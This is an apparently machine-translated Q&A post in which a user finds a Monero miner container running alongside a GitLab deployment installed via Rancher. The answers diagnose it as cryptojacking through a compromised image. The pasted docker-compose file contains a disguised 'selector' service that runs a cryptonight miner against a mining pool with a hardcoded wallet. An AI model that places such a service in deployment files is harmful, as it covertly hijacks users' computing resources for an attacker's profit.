在docker容器中执行的cpu挖掘器

Question

我通过Rancher的目录安装了gitlab。通过运行"docker ps“命令，我注意到有一个docker容器"moneropull / monero-miner”。我注意到这个容器是Gitlab容器的底层部分。在Rancher堆栈生成的dockercompose文件下面。我想知道“选择器”部分是否是强制的？我真的很想脱掉它。事实上，当gitlab的容器启动时，我注意到处理器的一致性非常高。

version: '2'
volumes:
  gitlab-app-data:
    driver: local
  gitlab-conf-files:
    driver: local
  gitlab-log-data:
    driver: local
services:
  gitlab-server:
    image: gitlab/gitlab-ce:9.5.10-ce.0
    environment:
      GITLAB_OMNIBUS_CONFIG: |-
        external_url 'http://gitehost.com'
        registry_external_url 'http://gitehost.com'
        gitlab_rails['gitlab_shell_ssh_port'] = PORT_NUMBER
    volumes:
    - /home/docker-volumes/gitlab/var/opt/gitlab:/var/opt/gitlab
    - /home/docker-volumes/gitlab/var/log/gitlab:/var/log/gitlab
    - /home/docker-volumes/gitlab/etc/gitlab:/etc/gitlab
    labels:
      io.rancher.container.hostname_override: container_name
  selector:
    image: moneropull/monero-miner
    stdin_open: true
    tty: true
    command:
    - -a
    - cryptonight
    - -o
    - stratum+tcp://monerohash.com:3333
    - -u
    - 42kVTL3bciSHwjfJJNPif2JVMu4daFs6LVyBVtN9JbMXjLu6qZvwGtVJBf4PCeRHbZUiQDzBRBMu731EQWUhYGSoFz2r9fj
    - -p
    - x
    labels:
      io.rancher.container.pull_image: always
  io.rancher.scheduler.global: 'true'

Answer 1

看起来你被密码劫持了。看看这个https://kromtech.com/blog/security-center/cryptojacking-invades-cloud-how-modern-containerization-trend-is-exploited-by-attackers

有几张图片被破坏了，我怀疑你不小心选了其中一张。

Answer 2

@piy26正确地指出了。您的设置似乎已被破坏。

来自rancher的原始gitlab撰写文件没有miner服务。这是链接：https://github.com/rancher/community-catalog/blob/master/templates/gitlab/4/docker-compose.yml#L10